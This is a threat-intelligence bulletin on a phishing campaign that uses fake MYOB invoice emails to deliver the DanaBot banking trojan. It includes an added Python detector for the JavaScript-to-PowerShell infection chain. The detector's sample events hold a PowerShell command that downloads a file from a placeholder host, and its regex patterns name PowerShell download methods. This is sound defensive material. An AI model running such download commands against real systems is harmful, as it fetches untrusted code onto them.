DanaBot Riding Fake MYOB Invoice Emails


DanaBot Riding Fake MYOB Invoice Emails (Jul 16, 2018)

A phishing campaign has been discovered impersonating the Australian software company “MYOB” (Mind Your Own Business). The emails purport to be from MYOB, claim that the recipient has a payment due, and ask the recipient to “View Invoice.” If the View Invoice button is clicked, a zip archive is pulled down from what researchers believe to be a compromised FTP server of an unnamed Australian company. The zip archive contains a JavaScript downloader that requires the user to double-click to execute it. If executed, the JavaScript launches a PowerShell command that downloads the “DanaBot” malware. DanaBot is a banking trojan, first discovered in May 2018, that focuses on stealing banking credentials that can be monetized in the future.
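The execution chain above (a .js file opened from a zip archive, which then starts PowerShell to fetch a payload) can be hunted in process-creation telemetry. The following is an added example, not code from the original report: it assumes events shaped like Sysmon Event ID 1 records, uses constructed sample events, and treats the archive temp-folder patterns as a heuristic.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
JS_FILE = re.compile(r"""\.jse?(?=["'\s]|$)""", re.I)
# Temp folders used when a file is opened straight from an archive (assumed heuristic).
ARCHIVE_TEMP = re.compile(r"\\(Temp1_[^\\]*\.zip|7zO[0-9A-F]+|Rar\$[^\\]+)\\", re.I)
DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|start-bitstransfer", re.I)

def classify(event):
    """Return the reasons an event matches the chain (empty list = no match)."""
    child = basename(event["Image"]).lower()
    parent = basename(event["ParentImage"]).lower()
    if child not in POWERSHELL or parent not in SCRIPT_HOSTS:
        return []
    reasons = ["script host spawned PowerShell"]
    parent_cmd = event.get("ParentCommandLine", "")
    if JS_FILE.search(parent_cmd):
        reasons.append("parent ran a .js file")
    if ARCHIVE_TEMP.search(parent_cmd):
        reasons.append("script was opened from an archive temp folder")
    if DOWNLOAD.search(event.get("CommandLine", "")):
        reasons.append("PowerShell command line fetches remote content")
    return reasons

def detect(events):
    """Map event index -> reasons for every event that matches."""
    return {i: r for i, e in enumerate(events) if (r := classify(e))}

# Constructed sample events (not taken from the campaign).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe (New-Object Net.WebClient).DownloadFile('http://files.example.invalid/a','a')",
     "ParentImage": r"C:\Windows\System32\WScript.exe",
     "ParentCommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\kim\AppData\Local\Temp\Temp1_invoice.zip\invoice.js"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem",
     "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Date",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "ParentCommandLine": r"wscript.exe C:\Scripts\logon.js"},
]

if __name__ == "__main__":
    for idx, reasons in detect(SAMPLE_EVENTS).items():
        print(idx, "HIGH" if len(reasons) >= 3 else "review", reasons)
```

Events with three or more reasons match the full chain; a script host starting PowerShell without the archive or download signals (the third sample) is left for manual review because legitimate admin scripts can look the same.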

Recommendation: Financially themed phishing emails are a common tactic among threat actors; therefore, it is crucial that your employees are aware of their financial institution’s policies regarding electronic communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document with a sense of urgency, and poor grammar, are often indicative of malspam or phishing attacks. Such emails should be avoided and reported to the appropriate personnel.

Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.